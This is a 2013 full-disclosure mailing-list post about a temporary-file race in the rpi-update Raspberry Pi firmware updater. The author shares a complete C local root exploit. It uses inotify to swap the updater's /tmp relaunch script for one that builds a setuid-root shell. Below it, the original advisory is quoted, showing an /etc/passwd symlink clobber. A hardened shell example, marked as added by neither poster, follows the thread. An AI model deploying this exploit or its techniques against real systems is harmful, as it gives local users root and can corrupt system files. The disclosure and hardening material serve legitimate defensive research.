Re: [Full-disclosure] rpi-update tmpfile vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] rpi-update tmpfile vulnerability
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Wed, 06 Mar 2013 02:25:27 +0000 (GMT)
Hello everyone,

I took a closer look at this vulnerability; here is my exploit to share:

 cat > /tmp/updateScript.sh << EOF     <-- if we own it first, wait for IN_MODIFY and inject our malicious code
 #!/bin/bash
 if mv "${_tempFileName}" "$0"; then
   rm -- "\$0"
   exec env UPDATE_SELF=0 /bin/bash "$0" "${FW_REV}"
 else
   echo " !!! Failed!"
 fi
 EOF

 echo " *** Relaunching after update"
 exec /bin/bash /tmp/updateScript.sh     <-- just runs whatever is here

This will poop out a root prompt for you!

raspi-p0wn.c
----------------------------------------

/* Local root exploit for rpi-update on Raspberry Pi.
   Vulnerability discovered by Technion, technion@xxxxxxxxxxx

   https://github.com/Hexxeh/rpi-update/

   larry@pih0le:~$ ./rpix updateScript.sh
   [*] Launching attack against "updateScript.sh"
   [+] Creating evil script (/tmp/evil)
   [+] Creating target file (/usr/bin/touch /tmp/updateScript.sh)
   [+] Initialize inotify on /tmp/updateScript.sh
   [+] Waiting for root to change perms on "updateScript.sh"
   [+] Opening root shell (/tmp/sh)
   # <-- Yay!

   Larry W. Cashdollar
   http://vapid.dhs.org
   @_larry0

   Greets to Vladz.
*/

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <sys/inotify.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <limits.h>

/* Create a small c program to pop us a root shell */
int create_nasty_shell(char *file)
{
    char *s = "#!/bin/bash\n"
              "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
              "cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
              "chmod 4755 /tmp/sh;\n";

    int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    write(fd, s, strlen(s));
    close(fd);

    return 0;
}

int main(int argc, char **argv) {
    int fd, wd;
    /* read(2) on an inotify fd fails with EINVAL unless the buffer can hold
       at least one struct inotify_event plus its name, so size it for that
       instead of the original 1-byte buffer (which never blocked) */
    char buf[sizeof(struct inotify_event) + NAME_MAX + 1];
    char *targetpath, *cmd,
         *evilsh = "/tmp/evil", *trash = "/tmp/trash";
    size_t tlen, clen;

    if (argc < 2) {
        printf("Usage: %s <target file> \n", argv[0]);
        return 1;
    }

    printf("[*] Launching attack against \"%s\"\n", argv[1]);

    printf("[+] Creating evil script (/tmp/evil)\n");
    create_nasty_shell(evilsh);

    /* size both buffers from the argument's actual length; the original used
       sizeof(argv[1]) (the pointer size) and a fixed 32-byte cmd buffer, which
       "/usr/bin/touch /tmp/updateScript.sh" already overflows */
    tlen = strlen(argv[1]) + sizeof("/tmp/");
    clen = tlen + sizeof("/usr/bin/touch ");
    targetpath = malloc(tlen);
    cmd = malloc(clen);
    snprintf(targetpath, tlen, "/tmp/%s", argv[1]);
    snprintf(cmd, clen, "/usr/bin/touch %s", targetpath);
    printf("[+] Creating target file (%s)\n", cmd);
    system(cmd);

    printf("[+] Initialize inotify on %s\n", targetpath);
    fd = inotify_init();
    wd = inotify_add_watch(fd, targetpath, IN_MODIFY);

    printf("[+] Waiting for root to modify :\"%s\"\n", argv[1]);
    /* blocks until the updater's "cat > /tmp/updateScript.sh" writes the file */
    syscall(SYS_read, fd, buf, sizeof(buf));
    /* swap our script into place before "exec /bin/bash /tmp/updateScript.sh" */
    syscall(SYS_rename, targetpath, trash);
    syscall(SYS_rename, evilsh, targetpath);

    inotify_rm_watch(fd, wd);

    printf("[+] Opening root shell (/tmp/sh)\n");
    sleep(2);
    system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");

    return 0;
}

On Feb 28, 2013, at 04:19 PM, Technion <technion@xxxxxxxxxxx> wrote:

> Raspberry Pi Firmware Updater Vulnerability
>
> Application:
> https://github.com/Hexxeh/rpi-update/
>
> Version Tested:
> Github source as of 10ad1e975a (10th Feb commit)
>
> Vulnerability #1:
> A malicious user can clobber any file due to insecure tmp file handling.
>
> Example:
>
> Any unprivileged user can create the following symlink, either from
> a shell account, or by malicious web content such as PHP scripts.
> pi@raspberrypi ~ $ ln -s /etc/passwd /tmp/updateScript.sh
>
> Once in place, the symlink is awaiting the administrator to run an update:
> pi@raspberrypi ~ $ sudo rpi-update
> ...
> pi@raspberrypi ~ $ cat /etc/passwd
> #!/bin/bash
> if mv "./testfile.sh.tmp" "./testfile.sh"; then
> rm -- "$0"
> exec env UPDATE_SELF=0 /bin/bash "./testfile.sh" ""
> else
> echo " !!! Failed!"
> fi
>
> As of this point, the pi is quite unusable due to the corrupted
> password database.
> Note that the attacker cannot customise the content, for example, to set
> a UID0 account.
>
> Vulnerability #2:
> The installation recommends the following command:
> sudo wget http://goo.gl/1BOfJ -O /usr/bin/rpi-update && sudo chmod +x /usr/bin/rpi-update
>
> Although the selfupdate functionality utilises SSL to ensure the integrity of
> the download, the installation process uses a URL shortening service without
> SSL to download the bash script, which the user is then encouraged to run as
> the root user.
>
> Fix and Vendor Response
> A pull request detailing exploit #1 and including a simple patch was submitted
> February 6th. The patch has not yet been accepted.
>
> Workaround
> By running rpi-update with the self update feature disabled, the affected code
> is not executed. Example:
> sudo UPDATE_SELF=0 rpi-update
>
> If you would like to update the application manually, or perform an initial
> installation safely, use the following commands:
> wget https://github.com/Hexxeh/rpi-update/raw/master/rpi-update
> sudo cp rpi-update /usr/bin/rpi-update && sudo chmod +x /usr/bin/rpi-update
>
> Note that applying the patch in my pull request will not be a complete
> solution, as it will be reverted after the first automatic update.
>
> technion@xxxxxxxxxxx
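Added here as an example, not rpi-update's own code nor from either poster: the relaunch-script step from the thread rewritten so the updater never writes to a fixed, world-writable /tmp path, plus the check an updater should make before exec'ing anything it found in tmp. Function names and the TMPDIR override are assumptions for this example.

```shell
#!/bin/bash
# Hardened relaunch-script creation for an rpi-update style self-updater
# (added example, not rpi-update's own code). The original wrote the script
# to the fixed path /tmp/updateScript.sh and exec'd it as root, so any local
# user could pre-plant a symlink there (the /etc/passwd clobber in the
# advisory) or swap in a script of their own between write and exec.
#
# Two layers of defence:
#   1. Write into a fresh mktemp -d directory (mode 0700, unpredictable
#      name), so no other user can pre-create or replace anything in it.
#   2. Open with noclobber (set -C) so a pre-existing path is refused rather
#      than followed, and re-check the file before it is ever exec'd.
# TMPDIR is honoured so the functions can be exercised outside /tmp (assumption).

safe_tmpdir() {
    mktemp -d "${TMPDIR:-/tmp}/rpi-update.XXXXXXXX"
}

# write_relaunch_script <downloaded_update> <path_of_this_script> <fw_rev>
# Prints the path of the generated relaunch script.
write_relaunch_script() {
    local temp_file="$1" self_path="$2" fw_rev="$3" dir script
    dir=$(safe_tmpdir) || return 1
    script="$dir/updateScript.sh"
    # \$0 is left for the relaunch script itself to expand; everything else
    # is filled in now, exactly as the original heredoc did.
    ( set -C; cat > "$script" ) <<EOF || return 1
#!/bin/bash
if mv "$temp_file" "$self_path"; then
    rm -- "\$0"
    exec env UPDATE_SELF=0 /bin/bash "$self_path" "$fw_rev"
else
    echo " !!! Failed!"
fi
EOF
    chmod 0700 "$script" || return 1
    printf '%s\n' "$script"
}

# check_script_safe <path>: succeeds only for a regular file that is not a
# symlink, is owned by the current uid, and is not group/other writable.
check_script_safe() {
    local path="$1" owner mode
    [ -f "$path" ] && [ ! -L "$path" ] || return 1
    owner=$(stat -c '%u' "$path") && [ "$owner" = "$(id -u)" ] || return 1
    mode=$(stat -c '%a' "$path") && [ $(( 0$mode & 022 )) -eq 0 ]
}
```

With UPDATE_SELF=0 (the advisory's workaround) none of this runs; when self-update is enabled, check_script_safe is the test to make immediately before the exec.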
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/